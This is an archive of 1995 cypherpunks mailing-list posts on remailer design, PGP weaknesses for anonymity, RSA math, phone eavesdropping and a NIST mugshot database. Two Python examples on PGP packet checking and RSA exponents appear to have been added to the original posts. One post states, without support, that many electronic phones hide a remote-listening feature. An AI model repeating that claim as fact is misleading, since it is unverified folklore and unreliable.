     tolerate such activities in others." The alternative is bleak: "...We 
     will degenerate into secretive, encrypted, overly protective 
     information hoarders, unwilling to share and disseminate knowledge -- 
     except for profit." (Information Week 2/6/95 p.64) 
     
     But, how do you really feel...
     John

John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peb@netcom.com (Paul E. Baclace)
Date: Fri, 3 Feb 95 09:28:27 PST
To: sandfort@crl.com
Subject: Re:  THROUGH THE LOOKING GLASS
Message-ID: <199502031709.JAA20821@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently a relative of mine was battered/assaulted in a park.  The
perp, after a personal item broke, called a friend at the police on 
his cell phone and an officer charged my relative for assault! The 
perp is also trying to sue for damages.  The relative is nearly at 
retirement age and the perp had 3 large attack dogs at the time.
This is a bad cop with a vindictive mentality and the court so far 
believes the cop. (My relative should be suing for psychological damages
after weeks of nightmares about being attacked and then betrayed
by the police and fear of retribution for pursuing justice.  This
is a very expensive process in money, time and emotions.)

A personal recording of what happened would make a lot of difference.

Paul E. Baclace
peb@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 3 Feb 95 09:15:23 PST
To: cypherpunks@toad.com
Subject: to hfinney
Message-ID: <199502031714.JAA01901@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


mr finney , do you know if that perl prog of yours to add stuff to .pgp
files can be ported to messy dos ?
many thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 3 Feb 95 07:26:27 PST
To: hfinney@shell.portal.com>
Subject: Re: Remailing in safe-tcl
In-Reply-To: <5122.791772273.1@nsb.fv.com>
Message-ID: <MjAYfK70Eyt5AxSd8B@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 2-Feb-95 Remailing in safe-tcl Hal@shell.portal.com (2397)

> I don't see any straightforward way for a script to suspend itself and
> re-activate on some future event (such as the arrival of another
> message).  Maybe it could put its whole self into the config database as
> a {key, value} pair and rely on future messages to pull it out and
> execute it.  But that doesn't seem too great.

The problem is that this is a very hard -- perhaps impossible -- thing
to build in at the level of a safe-tcl interpreter, because the safe-tcl
interpreter is supposed to be a relatively stand-alone thing.  To
activate something based on a future event requires some hooks into
external event management -- e.g. a cron job, or the message receipt
facilities of a specific mail tool, etc.   The challenge, I think, is to
figure out how to make sure safe-tcl has the right hooks for such an
external environment without REQUIRING one particular such environment
in order to run safe-tcl.

In other words, I think the best to be hoped for is for safe-tcl to have
the facilities that are needed by such an environment.  I'm not entirely
sure what those facilities are, but I'm optimistic that this could be
layered on using the "declareharmless" mechanism of safe-tcl.  Thus, you
could write (in full tcl) a procedure that essentially queues an event
for future processing, and make that procedure available to the safe-tcl
environment.  Is this plausible in your application context?

> There is a lot of interest in this notion of mail messages as scripted
> agents which go zipping about the network gathering data which they send
> home.  I am optimistic that we will be able to get remailing capabilities
> out of this infrastructure largely for free.

I think there's a good chance of that, yes.  Part of the safe-tcl
experiment, actually, is the attempt to figure out, cooperatively, what
all is needed in the way of infrastructure.  So what I'm most interested
in knowing is whether there are features you can imagine adding to
safe-tcl that would make this easier to do on your end...  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 3 Feb 95 10:33:32 PST
To: cypherpunks@toad.com
Subject: Re:  to hfinney
Message-ID: <199502031832.KAA10617@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: anonymous-remailer@shell.portal.com
> mr finney , do you know if that perl prog of yours to add stuff to .pgp
> files can be ported to messy dos ?
> many thanx

Perl does exist for ms-dos, and I think those scripts would probably work
OK there.  They don't do anything exotic, just some byte reads and
writes.  Maybe the random-number generation would need to be looked at;
as I said, that is the one weak part.  But probably they would work OK.
 
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 3 Feb 95 10:46:48 PST
To: Dale Harrison <daleh@ix.netcom.com>
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <199502030441.UAA17143@ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950203103828.3246E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 2 Feb 1995, Dale Harrison wrote:

> . . .
> Actually, there is a germ of truth in this.  On older phones (don't know if 
> this works on newer electronic phones) when the handset is 'on-hook' a 
> switch opens and breaks the voice circuit.  This of course only works for 
> DC circuits.  If you drive that same circuit with an AC signal . . .

There's another angle I may have mentioned before.  Many 
electronic phones come with a ``feature'' that allows you to 
call home, produce an electronic tone and eavesdrop on your own
house.  When the tone is sounded, the ringing stops (or never
starts) and the phone goes into ``off hook'' mode (i.e., the
microphone in the mouthpiece is turned on).

Even if you did not buy this feature when you bought your phone,
it is still there, just waiting for that electronic tone.  You 
can't produce it, because you didn't buy the doohickey, but anyone
with such a doohickey can call your house and listen in. . .


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 3 Feb 95 11:42:27 PST
To: cypherpunks@toad.com
Subject: re to hfinney
Message-ID: <199502031941.LAA18023@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


hal sez:

: Perl does exist for ms-dos, and I think those scripts would probably work
: OK there.  They don't do anything exotic, just some byte reads and
: writes.  Maybe the random-number generation would need to be looked at;
: as I said, that is the one weak part. But probably they would work OK.

kool . could you please repost the scripts , i seem to have misplaced them.
also , where can i get perl for dos , any idea ? tia .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 3 Feb 95 11:52:36 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <9502030123.AA02022@josquin.media.mit.edu>
Message-ID: <199502031942.LAA15031@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Derek Atkins <warlord@MIT.EDU>

   > I agree.  PGP just does not have the support for the encryption
   > required for mixing remailers.

   How
   is PGP deficient?  What do you need PGP to do in order to get it to
   work right with remailers?

Note that I said mixing remailers, not just regular remailers.

-- No support for random padding to a fixed length.  Yes, this can be
patched by script.  Hell, you could rewrite PGP with a script, so the
existence of a workaround is no defense.

-- Message size blowup for encrypted armor-within-armor.  Yes, I know
it compresses, but it would be a better thing to get PGP to unpack a
PGP encrypted message (the message to the next hop) to multipart form,
part regular text, part armored.

-- Inability to restrict PGP from accepting a non-encrypted message.
PGP run on an armored plaintext file will work just as if it were
encrypted.  This precludes being able to require encryption as a site
policy.  (Again this can probably be worked around; again, not an
excuse.)

In addition, there's a few really bad misfeatures for pseudonymity
(which is what everyone seems to want to do with remailers):

-- Identities for secret keys are in cleartext in the secret key ring.
Upon seizure of a secret key ring, presence of a pseudonym name can be
considered a presumption of possession of a corresponding secret key,
simply because people don't fill up their secret key rings with bogus
keys with other people's names.

-- Key ID of the recipient is always in the clear.

-- The RSA-encrypted session key does not have a flat representation
over its multiword container.  This yields a statistical traffic
analysis hole.  (This point is irrelevant without fixing 4.)  Hal and
I completely solved this problem last year.


This is all I can think of off the top of my head.  Not having
analyzed the problem recently, I can't say that I've got everything.

Eric
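[Added example, not part of the original post: a de-armored message checker covering two points from this thread, Hal's remark that appended padding shows up because the packet byte count no longer matches the file size, and the site-policy item above about refusing messages that are not encrypted. It assumes PGP 2.x old-style packet headers (tag in bits 5-2 of the first byte, length-field size in bits 1-0); all sample bytes and function names are constructed.]

```python
TAG_PKE, TAG_COMPRESSED, TAG_ENCRYPTED, TAG_LITERAL = 1, 8, 9, 11
TAG_NAMES = {TAG_PKE: "public-key encrypted session key",
             TAG_COMPRESSED: "compressed data",
             TAG_ENCRYPTED: "conventionally encrypted data",
             TAG_LITERAL: "literal data"}

def make_packet(tag, body, ltype):
    """Build an old-style packet. ltype 0/1/2 = 1/2/4-byte length, 3 = none."""
    ctb = 0x80 | (tag << 2) | ltype
    length = b"" if ltype == 3 else len(body).to_bytes(1 << ltype, "big")
    return bytes([ctb]) + length + body

def walk_packets(blob):
    """Return (packets, trailing). packets holds (tag, offset, header_len,
    body_len); trailing counts bytes after the last well-formed packet."""
    packets, pos = [], 0
    while pos < len(blob):
        ctb = blob[pos]
        if ctb & 0xC0 != 0x80:            # not an old-style packet header
            break
        tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
        if ltype == 3:                    # indeterminate: runs to end of file
            hdr, body = 1, len(blob) - pos - 1
        else:
            hdr = 1 + (1 << ltype)
            body = int.from_bytes(blob[pos + 1:pos + hdr], "big")
        if pos + hdr + body > len(blob):  # declared length overruns the file
            break
        packets.append((tag, pos, hdr, body))
        pos += hdr + body
    return packets, len(blob) - pos

def check_remailer_policy(blob):
    """List of reasons to reject; an empty list means the message passes."""
    packets, trailing = walk_packets(blob)
    tags = [p[0] for p in packets]
    problems = []
    if not tags or tags[0] != TAG_PKE:
        first = TAG_NAMES.get(tags[0], "tag %d" % tags[0]) if tags else "no packet"
        problems.append("first packet is %s, not a public-key encrypted "
                        "session key" % first)
    elif tags[-1] != TAG_ENCRYPTED or any(t != TAG_PKE for t in tags[:-1]):
        problems.append("expected session-key packets followed by one "
                        "encrypted data packet")
    if trailing:
        problems.append("%d bytes are not covered by any packet length" % trailing)
    return problems

def pad_last_packet(blob, junk):
    """Append junk to the final encrypted-data packet and rewrite its length
    field, the byte-count adjustment Hal describes."""
    packets, trailing = walk_packets(blob)
    if trailing or not packets or packets[-1][0] != TAG_ENCRYPTED:
        raise ValueError("not a well-formed encrypted message")
    _, offset, hdr, body = packets[-1]
    old_body = blob[offset + hdr:offset + hdr + body]
    return blob[:offset] + make_packet(TAG_ENCRYPTED, old_body + junk, 2)

# Constructed samples: one session-key packet plus an encrypted-data packet,
# and a compressed packet such as armoring an unencrypted file would wrap.
ENCRYPTED_MSG = (make_packet(TAG_PKE, bytes(140), 1)
                 + make_packet(TAG_ENCRYPTED, bytes(range(64)), 2))
PLAINTEXT_MSG = make_packet(TAG_COMPRESSED, b"constructed compressed stream", 3)
JUNK = bytes(32)

if __name__ == "__main__":
    print("as sent        :", check_remailer_policy(ENCRYPTED_MSG))
    print("junk appended  :", check_remailer_policy(ENCRYPTED_MSG + JUNK))
    print("length adjusted:", check_remailer_policy(pad_last_packet(ENCRYPTED_MSG, JUNK)))
    print("not encrypted  :", check_remailer_policy(PLAINTEXT_MSG))
```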




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
Date: Fri, 3 Feb 95 08:50:25 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
Message-ID: <m0raRHW-0006WvC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: anonymous-remailer@shell.portal.com
>  Well, *I* think it is a good idea.  But how does remailer1 know that
>remailer2 is both a remailer and down?

By attempting a connection to the SMTP port and using the alternate if
it fails?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 3 Feb 95 10:24:21 PST
To: "Paul E. Baclace" <peb@netcom.com>
Subject: Re: THROUGH THE LOOKING GLASS
In-Reply-To: <199502031709.JAA20821@netcom20.netcom.com>
Message-ID: <Pine.SOL.3.90.950203131758.22196B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


There really is a CP thread here.  

After you've had one of these experiences, you will not trust
authority any more.

I can't wait for the "good faith" exception to the 4th amendment
to hit the streets.

bd


On Fri, 3 Feb 1995, Paul E. Baclace wrote:

> Recently a relative of mine was battered/assaulted in a park.  The
> perp, after a personal item broke, called a friend at the police on 
> his cell phone and an officer charged my relative for assault! The 
> perp is also trying to sue for damages.  The relative is nearly at 
> retirement age and the perp had 3 large attack dogs at the time.
> This is a bad cop with a vindictive mentality and the court so far 
> believes the cop. (My relative should be suing for psychological damages
> after weeks of nightmares about being attacked and then betrayed
> by the police and fear of retribution for pursuing justice.  This
> is a very expensive process in money, time and emotions.)
> 
> A personal recording of what happened would make a lot of difference.
> 
> Paul E. Baclace
> peb@netcom.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 3 Feb 95 14:29:55 PST
To: cypherpunks@toad.com
Subject: Remailer Unreliability
Message-ID: <199502032132.AA09239@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

>>  Well, *I* think it is a good idea.  But how does remailer1 know that
>>remailer2 is both a remailer and down?
>
>By attempting a connection to the SMTP port and using the alternate if
>it fails?

This depends on a significant change in remailer features - existing
remailers don't do message delivery, they pass remailed messages off 
to the local MTA (e.g, sendmail, Smail, whatever) and let it take
care of delivery. Expecting remailers to handle queueing and delivery
adds lots of code and complexity. (It also may piss off sysadmins who
aren't remailer operators. Bogus or not, some institutions frown on
attempting mail delivery manually or with non-standard programs.)

Also, it's difficult to say when delivery has failed. Not every failure
(where failure = not delivered in a reasonable time) results in a
bounce message; if the sending remailer can't determine success or
failure immediately, it will have to keep a database of the last few
(hundred, probably) primary/alternate address pairs, and then 
extract the failed message from the bounce message, then reprocess 
with the alternate address. Yuck. 

I think the easiest way to do this would be for remailers to have a
list of "unavailable remailers", and to process the primary/alternate
choice immediately upon receipt/resending - but if we have a good way
to provide the remailers with availability information, we've probably
found a good way to provide it to users, too.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzKgyH3YhjZY3fMNAQHlkwP7Bj5D5PbC1H+x3XXqP3gdUTTL6eLMjt2d
6cmj/kr0nv88XwXkIttj7r4wSDRXSe8K4mpU4utNQ1l+RlArDzZLkiY/qleuRhGX
yRplXo6eoNwSv24oBCIVwdu7r+gnlhVs4sU3tzkWD+deOQxVXffdPL0opZ1Cn8v6
qRmKmuOYFB8=
=i/8j
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 3 Feb 95 13:58:56 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: Lucky primes & omlets on my face...
In-Reply-To: <199502020213.SAA17094@jobe.shell.portal.com>
Message-ID: <9502032157.AA04050@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
> > (x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  
> 
> This would only be true for prime p, but with RSA we are dealing with
> composite moduli.  What we want is ed=1 mod phi(n), where
> phi(n)=(p-1)(q-1).  (Actually you want to use (p-1)(q-1)/gcd((p-1),(q-1)).
> I forget what that is called.)

"Least common multiple," or LAMBDA(n).


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
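
The point made in this exchange, worked through as an added example (not part of either message): the prime-modulus identity does not carry over to a composite n, and a private exponent taken modulo lcm(p-1, q-1) works as well as one taken modulo (p-1)(q-1). The primes 61 and 53, the exponent 17 and all function names are constructed for the illustration.

```python
from math import gcd


def lcm(a, b):
    return a * b // gcd(a, b)


def rsa_exponents(p, q, e):
    """Return (n, phi, lam, d_phi, d_lam) for primes p, q and public exponent e."""
    n = p * q
    phi = (p - 1) * (q - 1)
    lam = lcm(p - 1, q - 1)          # equals phi / gcd(p-1, q-1)
    if gcd(e, lam) != 1:
        raise ValueError("e must be coprime to lcm(p-1, q-1)")
    d_phi = pow(e, -1, phi)          # inverse of e modulo phi(n)
    d_lam = pow(e, -1, lam)          # inverse of e modulo lambda(n)
    return n, phi, lam, d_phi, d_lam


def naive_exponent(n, e):
    """Inverse of e modulo n-1, i.e. treating the composite n as if it were prime."""
    return pow(e, -1, n - 1)


def round_trips(n, e, d):
    """True if (x^e)^d == x mod n for every x in 0..n-1."""
    return all(pow(pow(x, e, n), d, n) == x for x in range(n))


def fermat_holds(n):
    """True if x^n == x mod n for every x, the identity quoted for prime p."""
    return all(pow(x, n, n) == x for x in range(n))


if __name__ == "__main__":
    p, q, e = 61, 53, 17
    n, phi, lam, d_phi, d_lam = rsa_exponents(p, q, e)
    print("n =", n, "phi =", phi, "lambda =", lam)
    print("d mod phi    =", d_phi, "round-trips:", round_trips(n, e, d_phi))
    print("d mod lambda =", d_lam, "round-trips:", round_trips(n, e, d_lam))
    d_bad = naive_exponent(n, e)
    print("d mod (n-1)  =", d_bad, "round-trips:", round_trips(n, e, d_bad))
    print("x^n = x holds for 61:", fermat_holds(61), " for n:", fermat_holds(n))
```

The two valid exponents differ only by a multiple of lambda(n), so the smaller one decrypts identically with less work.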



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Technoshaman Tom <tedwards@wam.umd.edu>
Date: Fri, 3 Feb 95 11:17:35 PST
To: cypherpunks@toad.com
Subject: Mugshot Identification Database announcement
Message-ID: <Pine.ULT.3.91.950203140756.10904D-100000@rac5.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Heard elsewhere...

                 National Institute of Standards and Technology

                           announces the release of
                           NIST Special Database 18

                    Mugshot Identification Database (MID)

NIST Special Database 18 is being distributed for use in development and
testing of automated mugshot identification systems. The database consists
of three CD-ROMs, containing a total of 3248 images of variable size,
compressed with lossless compression. Each CD-ROM requires approximately
530 megabytes of storage compressed and 1.2 gigabytes uncompressed
(2.2 : 1 average compression ratio). There are images of 1573 individuals
(cases), 1495 male and 78 female. The database contains both front and
side (profile) views when available. Separating front views and profiles, 
there are 131 cases with two or more front views and 1418 with only one
front view. Profiles have 89 cases with two or more profiles and 1268 with
only one profile. Cases with both fronts and profiles have 89 cases with
two or more of both fronts and profiles, 27 with two or more fronts and
one profile, and 1217 with only one front and one profile. Decompression
software, which was written in C on a SUN workstation [1], is included
with the database.

NIST Special Database 18 has the following features:

	+  3248 segmented 8-bit gray scale mugshot images (varying sizes)
           of 1573 individuals
	+  1333 cases with both front and profile views (see statistics above)
	+  131 cases with two or more front views and 89 cases with two or
           more profiles
	+  images scanned at 19.7 pixels per mm
	+  image format documentation and example software is included

Suitable for automated mugshot identification research, the database can be used for:

	+  algorithm development
	+  system training and testing

The system requirements are a CD-ROM drive with software to read ISO-9660
format and the ability to compile the C source code written on a SUN
workstation [1].

Cost of the database: $750.00.

For ordering information contact:

                            Standard Reference Data
                National Institute of Standards and Technology
                            Building 221, Room A323
                            Gaithersburg, MD 20899
                             Voice: (301) 975-2208
                             FAX:   (301) 926-0416
                          email: srdata@enh.nist.gov

All other questions contact:
                            Craig Watson
		       craig@magi.ncsl.nist.gov
			    (301)975-4402


[1]  The SUN workstation is identified in order to adequately specify or
     describe the subject matter of this announcement. In no case does
     such identification imply recommendation or endorsement by the
     National Institute of Standards and Technology, nor does it imply
     that the equipment is necessarily the best available for the purpose.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 3 Feb 95 11:42:44 PST
To: cypherpunks@toad.com
Subject: Re: Compromising the first remailer
Message-ID: <ab58386301021004942b@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:11 PM 02/03/95, rishab@dxm.ernet.in wrote:
>Actually any remailer, with NSA-modified operating software, can correlate the
>message it receives to the one it sends out, by keeping track of the message
>past any decryption until it's posted out. With rational use of garbage and
>chaining, all you do is stop the NSA from knowing your final destination from
>the first remailer, but they _would_ know the identity of the second remailer
>(assuming the first is compromised) and could try to attack the second, ad
>nauseam. Of course this was always known to be the problem, to which chaining
>and traffic analysis evasion are partial solutions.

Yes, but as long as _one_ remailer in your chain is not compromised by the
NSA, and if that one remailer has high enough traffic going through it and
does the proper things with reordering and latency and such (a big "if",
currently), you're still safe.

That turns out to be the whole purpose of chaining, since it has been shown
that it doesn't necessarily make traffic analysis any harder.  The purpose
is to hope that at least one link on your chain is both honest and properly
working.  Yeah, if all the links on your chain are NSA-sponsored, you're in
trouble.  Nothing that can be done about that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 3 Feb 95 15:16:13 PST
To: cypherpunks@toad.com
Subject: Re: VoicePGP cracked in 10 minutes?...
Message-ID: <9502032249.AA04577@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I heard a rumor here in Ctl. Tx. that the VoicePGP project was cracked in the
> > last couple of days in approx. 10 minutes. Anyone have any info on this other
> > than one of those wild rumors that occur?
> 
> Considering that VoicePGP hasn't even been released, this is
> fascinating news. Perhaps the same team could work next on cracking
> things that haven't even been invented yet.

Cracking VoicePGP is easy, since it's still a bones version without
the encryption installed yet - anybody who can figure out where
to get the software should be able to do it.  Might take more than
10 minutes to do that :-)

However, the rumor mostly sounded like a pro-active version of the
"NSA cracked PGP" version of the FBI Modem Tax on Religious Broadcasting
put out by Madeline Murray O'Shergold.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 3 Feb 95 15:14:54 PST
To: remailer-operators@c2.org
Subject: Re: MX'ing and jpunix.com
In-Reply-To: <199502022127.PAA14199@jpunix.com>
Message-ID: <199502032312.PAA15531@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "John A. Perry" <perry@jpunix.com>

	   Additional masking can be provided by having the MX record point
   to myriad.pc.cc.cmu.edu. What good does this do? I have an agreement with
   myriad.pc.cc.cmu.edu (Matt Ghio) where myriad will take the MX-pointed
   record and additionally alias it through the smail daemon on myriad. 

This is the beginning of private name service.  The machines behind
this MX record are not particularly visible to the outside.  Given the
existence of such machines, it makes sense to consider giving them
names which are also not too visible from the outside.

A group of remailer operators who had access to the DNS setups on
their machines could create their own personal top-level domain.  For
sake of discussion, let's call it ".cp".  Now random Unix boxes on the
Internet won't be able to gain access to .cp addresses, but the
remailer club would.  Outside parties would be able to be shown .cp
addresses but would not be able to resolve where the machines actually
were on the Internet, much less find them IRL.  (Access control on who
can pull .cp records will have to be added to the DNS software in
order to do this.)

Consider this in the light of Matt Ghio's MX service.  Matt MX's for
the alias.net addresses.  Inside alias.net, the individual remailers
could use .cp addresses to talk to each other.  In fact, those who
want zero contact with the outside world could advertise only .cp
addresses and mail only to other .cp addresses.

For sake of experimentation, I've set up a primary top-level
nameserver here on my machine for ".cp".  In order to access it,
you'll need to act as a secondary name server for the domain.  Hacking
alternate roots into BIND comes later.  Just add the following line to
your named.boot file:

    secondary       cp      204.94.187.1    db-secondary.cp

If you do this, you'll be able to ask for a second-level domain.
If you want a .cp domain, send mail to

    hostmaster@ndip.cp

Tell the kind hostmaster what name you want, what you want it for,
where your name servers are, etc.  This is an experimental service and
is not guaranteed to be reliable.  It might also serve as a test bed
for doing cryptographic name service trials.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 3 Feb 95 15:24:04 PST
To: skaplin@mirage.skypoint.com
Subject: Re:  Is the remailer crisis over?
Message-ID: <9502032313.AA04793@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
> greater than 99%. What's the consensus...Is the remailer crisis over?

The "remailers are broken" crisis may be over, but until there
are a lot of remailers in service, and 14 isn't a lot,
with a lot of traffic on them, remailers won't be a very effective
security tool.  

If the Bad Guys wanted to watch all 14 remailers,
it'd probably not be hard to figure out which messages came from
which senders, just because there aren't enough for real tracking.
If the Bad Guys decided to confiscate 14 remailers, they could do it.
If your machine got busted or sued for sending an anonymous message somebody
didn't like, and you contended that you're a remailer and there was
no way to prove it originated on your machine, "they" could respond that
you're not one of the 14 well-known remailers and if you were "they"
would have been watching you because they watch every machine that
talks to the well-known remailers, and you're not one of them.

As the folks in the nuclear-war planning business say, fewer than
100 of anything isn't reliable.  

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 3 Feb 95 19:58:31 PST
To: hkhenson@cup.portal.com
Subject: Re:  commercial authecation
Message-ID: <9502032329.AA04966@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Keith Henson asked how to find the digital-time-stamp folks,
Surety Technologies Inc., started by Stuart Haber and Scott Stornetta 
as a spinoff of Bellcore.

They're now actively in business - there was an article in one of the 
trade rags that you can get their signature kit for PCs for
something like $50 with tokens for 50 notarizations.
Details on their web page.

email: info@surety.com  
www: http://surety.com  - with lots of little graphic icons :-(
ftp: surety.com 

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Fri, 3 Feb 95 13:42:54 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: re to hfinney
In-Reply-To: <199502031941.LAA18023@jobe.shell.portal.com>
Message-ID: <9502032142.AA17527@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


> 
> hal sez:
> 
> : Perl does exist for ms-dos, and I think those scripts would probably work
> : OK there.  They don't do anything exotic, just some byte reads and
> : writes.  Maybe the random-number generation would need to be looked at;
> : as I said, that is the one weak part. But probably they would work OK.
> 
> kool . could you please repost the scripts , i seem to have misplaced them.
> also , where can i get perl for dos , any idea ? tia .
> 
> 

PERL can be obtained via anon FTP:

 ftp.uu.net			137.39.1.9
 archive.cis.ohio-state.edu  	128.146.8.52
 jpl-devvax.jpl.nasa.gov  	128.149.1.43

Get the source code and start compiling... :>

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.  MicroSoft SNA Server SUCKS.. buy it at your own risk.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rchcnslt@epix.net
Date: Fri, 3 Feb 95 16:11:52 PST
To: cypherpunks@toad.com
Subject: AIR Mosaic Feedback Mail
Message-ID: <199502040009.AA26622@relay.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain


Mail sent from AIR Mosaic (16-bit) version 3.07.04.02 

howdy..
Cyperpuk, life and all that..

Lemme in on the cool poop!

Rick R.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Feb 95 13:12:51 PST
To: cypherpunks@toad.com
Subject: NYT on Jihad
Message-ID: <199502032112.QAA08358@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



   The New York Times
   February 3, 1995, p. A19


   [Column] On My Mind


   A. M. Rosenthal


   Jihad in America


   The Clinton Administration has come to two major
   conclusions about terrorism in America, and from America.


   The first is that the United States is becoming a
   national safe haven for terrorists from the Middle East:
   a combination bank, fund-raiser, militarist training
   ground, recruitment center, political academy and
   embarkation dock.


   Second conclusion: Do something. So one recent night,
   instructions from Washington went out to banks nationwide
   to freeze the funds of the various Hamas Hezbollah and
   Islamic Jihad units, and their clones, operating from the
   East Coast to Texas and California. Mr. Clinton did that
   by Presidential order.


   Now the Administration is asking Congress to pass new
   anti-terrorist legislation. It would enable the
   Government to trace funds to and from the
   terrorist-supporting groups, tighten the definition of
   terrorism, enlarge the powers of Federal attorneys to
   deal with it and make it illegal to plan or train for
   terrorism abroad as well as in the U.S.


   The draft legislation is called the Omnibus
   Counterterrorism Act of 1995. It was drawn up by the
   Department of Justice on Presidential order and will be
   introduced in Congress in a matter of days.


   For Americans who have been warning about terrorism
   operating in and out of America, the time to relax has
   hardly arrived. We will see how effective it is in ending
   the contribution to terrorism of American laws and
   American inattention.


   But the fact is that the Clinton Administration has begun
   to pay more attention to the growth of terrorist
   organizations here than its predecessors have. And in
   parts of the government intelligence machinery, the
   assessment of the danger of terrorism originating in
   America is strong enough to surprise even anti-terrorism
   alarm ringers like myself.


   In large part, the awakening can be credited to the
   terrorists themselves. Even for America, blowing up the
   World Trade Center was a little thick.


   But the next time you get all worked up about the
   dastardly press, do remember that in the matter of
   terrorism, as so many others, it was an American
   journalist whose skill, determination and risk-taking
   (physical and professional) helped shake government
   awake.


   On Nov. 21, 1994, PBS presented "Jihad in America." The
   documentary laid it all out on film -- the meetings in
   American cities where the cry of holy war went up against
   America, Christians, Jews and Muslims who would not
   surrender to fundamentalism; the training; the visits to
   American units by Middle Eastern leaders of Hamas and
   Islamic Jihad, and the fund-raising structure that
   supported terrorism.


   The executive producer was Steven Emerson, an
   investigator of terrorism who has turned out a strong
   body of work in film, books and print journalism. Among
   government officials I talked to, credit for Mr. Emerson
   was not only acknowledged but volunteered.


   Democracy often has a tough time defending itself because
   it has to operate step by step, inch by inch, under the
   law. Yes, of course, that is democracy's blessing and
   strength.


   But nothing says a democracy has to watch the bombers
   come racing in their trucks and pretend they are
